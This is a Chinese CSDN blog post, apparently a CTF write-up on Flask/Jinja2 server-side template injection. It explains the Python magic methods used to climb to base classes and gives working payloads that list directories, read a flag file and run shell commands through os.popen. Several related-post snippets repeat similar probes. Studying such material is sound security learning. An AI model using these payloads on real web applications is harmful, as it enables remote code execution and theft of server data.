web__python__template

于 2023-02-22 21:47:45 发布
阅读量87 收藏
点赞数
文章标签: flask python 后端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129170885
版权

1.打开环境,审计代码

2.考点是python404模板注入,几种常用于ssti的魔术方法。

__class__ 返回类型所属的对象
 
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
 
__base__ 返回该对象所继承的基类
 
// __base__和__mro__都是用来寻找基类的
 
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
 
__init__ 类的初始化方法
 
__globals__ 对包含函数全局变量的字典的引用
 
__builtins__ builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以可以直接调用引用的模块

3.获取基类的几种方法

[].__class__.__base__
 
''.__class__.__mro__[2]
 
().__class__.__base__
 
{}.__class__.__base__
 
request.__class__.__mro__[8]   //针对jinjia2/flask为[9]适用
 
或者
 
[].__class__.__bases__[0] //其他的类似

4.读取基类后,会返回字典一样的东西,需要注意的是file一般在40,os一般在71

payload:

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}#另一种姿势

参考文章:Python-模板注入

ha0cker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1146
好难啊
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 707
Web_python_template_injection(攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
web python template injection_攻防世界-Web_python_template_injection详解
weixin_39989668的博客
12-10 423
Web_python_template_injection在做这道题之前如果大家不懂可以先看一看这篇文章:从零学习flask模板注入基础知识:在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。1.判断有无模板注入payloadhttp://220.249.52.133:53362/{{7+7}}查看全局变量http://220.249.5...
攻防世界之Web_python_template_injection (web进阶)
my_name_is_sy的博客
06-29 1974
考点为模板漏洞及其利用。
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3334
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
Web_Front.zip_django_python mysql
09-19
【标题】"Web_Front.zip_django_python mysql" 指的是一个使用Python的Django框架构建的,基于MySQL数据库的简单网站示例。这个压缩包文件包含了开发这样一个Web前端所需的所有资源。 【描述】"a simple website ...
sun-web.tar.gz_Django_web_django_django blog_python html_python
09-24
1. **Django框架**:Django是Python编程语言中的一款高级Web开发框架,它遵循MTV(Model-Template-View)设计模式,提供了一整套解决方案,包括数据库模型设计、URL路由、视图处理以及模板渲染等功能,帮助开发者...
drf_demo01_pythonweb_django_
10-03
标题“drf_demo01_pythonweb_django_”暗示了一个基于Python Web开发的项目,特别使用了Django框架。这个项目可能是一个简单的演示,用于展示如何在Django后台管理界面中实现用户和组的列表视图。让我们深入探讨...
使用_Django_和_Python_开发_Web_站点
04-19
在本文中,我们将深入探讨如何使用Django框架和Python编程语言来开发Web站点。Django是一个强大且功能丰富的开源Web应用框架,它基于Python语言,旨在简化Web开发过程,提高开发效率。 首先,Python是Django的基础...
WEB_flask2
03-18
标题 "WEB_flask2" 暗示我们讨论的主题是使用 PythonFlask 框架进行 Web 开发。Flask 是一个轻量级的 Web 应用程序框架,以其灵活性和简洁性受到开发者喜爱。接下来,我们将深入探讨 Flask 的核心概念、主要特性...
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6622
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
[wp] Web_python_template_injection 攻防世界
夏日 の blog
02-06 1327
打开题目我们看到 提示python模板注入,尝试{{1+1}}看看{{}}是否被执行 由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3501
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
web_进阶_Web_python_template_injection
JURUO222的博客
08-08 355
参考文章 #flask模板注入 flask的渲染方法有render_template和render_template_string两种。 render_template()是用来渲染一个指定的文件的。使用如下 return render_template(‘index.html’) render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。 使用方法如下 html = ‘This is index page’ return render_template_strin
Web安全Web_python_template_injection)
m0_56010012的博客
03-01 1600
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6903
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
web python template injection_CTF引出对Python模板注入的思考
weixin_39630466的博客
12-10 331
前记最近在做ctf的时候碰到了两道跟python模板注入有关的题,在看了网上各位大佬们的解析之后把flag解了出来,但是对原理还是不太清晰,于是心血来潮看了看。题解第一题是:Web_python_template_injection题目如下:由于题目有提示模板注入,于是尝试构造payload,如下:220.249.52.133:46596/{{1+1}}发现在URL后出现了1+1的返回值,说明传入...
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 558
有关python模板注入漏洞的学习
攻防世界-Web_python_template_injection题
weixin_46784800的博客
11-18 2533
flask基础 SSTI:服务器端模板注入(Server-Side Template Injection) 不正确的使用flask中的render_template_string方法会引发SSTISSTI文件读取/命令执行 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 思路:找到父类<type 'object'>–>寻找子类–>找关于命令执行或者文件操作的模块。 _class_ 返回类型所属的对象 _mro
web_python_template_injection
最新发布
03-16
Web Python 模板注入是一种在Web应用程序中使用Python模板引擎时可能存在的安全漏洞。通过将恶意代码注入模板中,攻击者可能能够执行任意代码,访问敏感信息,或者控制应用程序。应该通过验证用户输入并使用严格的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值